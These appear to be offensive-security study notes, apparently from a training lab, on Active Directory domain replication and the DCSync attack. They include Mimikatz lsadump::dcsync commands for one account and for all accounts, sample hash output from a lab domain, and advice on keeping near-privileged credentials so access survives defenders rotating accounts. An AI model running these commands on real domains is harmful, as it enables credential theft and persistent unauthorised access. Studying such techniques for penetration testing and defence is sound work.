Credentials
Administrators - Replicating Directory Changes
Domains are often used across multiple regional locations, and relying on a single Domain Controller would significantly delay Authentication services in AD. As such, these Organizations make use of multiple DCs, so it is possible to Authenticate with the same Credentials in two different Locations. The process that keeps the DCs consistent with each other is called Domain Replication.
Each Domain Controller runs a process called the Knowledge Consistency Checker (KCC). The KCC generates a replication topology for the AD Forest and automatically connects to other Domain Controllers through Remote Procedure Calls (RPC) to Synchronize Information. This includes updated Information such as a User's new Password, and new Objects such as a newly created User.
A popular Attack to perform is a DC Sync Attack. If we have access to an Account that has Domain Replication Permissions (the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object), we can pretend to be a DC and ask a real DC to replicate its secrets to us, Harvesting Credentials from the DC without ever touching its disk.
Not All Credentials Are Created Equal
If we only have Privileged Credentials, it is safe to say that as soon as the Blue Team discovers us, they will Rotate those Accounts, and we can potentially lose our Access.
The goal then is to persist with Near-Privileged Credentials:
- Credentials that have Local Administrator rights on Several Machines: Usually, organizations have Groups with Local Admin rights on almost all Computers. These Groups are typically divided into one for Workstations and one for Servers.
- Service Accounts that have Delegation Permissions: With these accounts, we would be able to forge Golden and Silver Tickets to perform Kerberos Delegation Attacks.
- Accounts used for Privileged AD Services: If we compromise Accounts of Privileged Services such as Exchange, Windows Server Update Services (WSUS), or System Center Configuration Manager (SCCM), we could leverage AD Exploitation to once again gain a Privileged Foothold.
DCSync
We can use Mimikatz to Harvest these Credentials. [An Account with Domain Replication rights is Required; Domain Administrators hold these rights by default]
Mimikatz Commands and Output:
:: Performing a DC Sync of a Single Account [Our own for Example]
lsadump::dcsync /domain:za.adobe.loc /user:<Low-Privilege AD Username>
[DC] 'za.adobe.loc' Will be the Domain
[DC] 'PCDC.za.adobe.loc' Will be the DC Server
[DC] '<Low-Privilege AD Username>' Will be the User Account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : <Low-Privilege AD Username>
** SAM ACCOUNT **
SAM Username : <Low-Privilege AD Username>
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/25/2022 7:30:21 PM
Object Security ID : S-1-5-21-3885271727-2693558621-2658995185-1429
Object Relative ID : 1429
Credentials:
Hash NTLM: fbdcd5041c96ddbd82224270b57f11fc
ntlm- 0: fbdcd5041c96ddbd82224270b57f11fc
lm - 0: 0fd2685aa18c78bd265d02bdec203b04
[...]
* Primary:WDigest *
01 991d45386dd3561e0c5529d3605f96e6
02 d5d6f25b233c87b289706d7b423f1145
[...]
:: Performing a DC Sync of Every Account
:: Logging must be Enabled for this Task, as the Output is far too long to read in the Console
log <Username>_dcdump.txt
:: Instead of Specifying the Username, the Flag [/all] is Used
:: The Output will go into the Log File in your Current Directory
lsadump::dcsync /domain:za.adobe.loc /all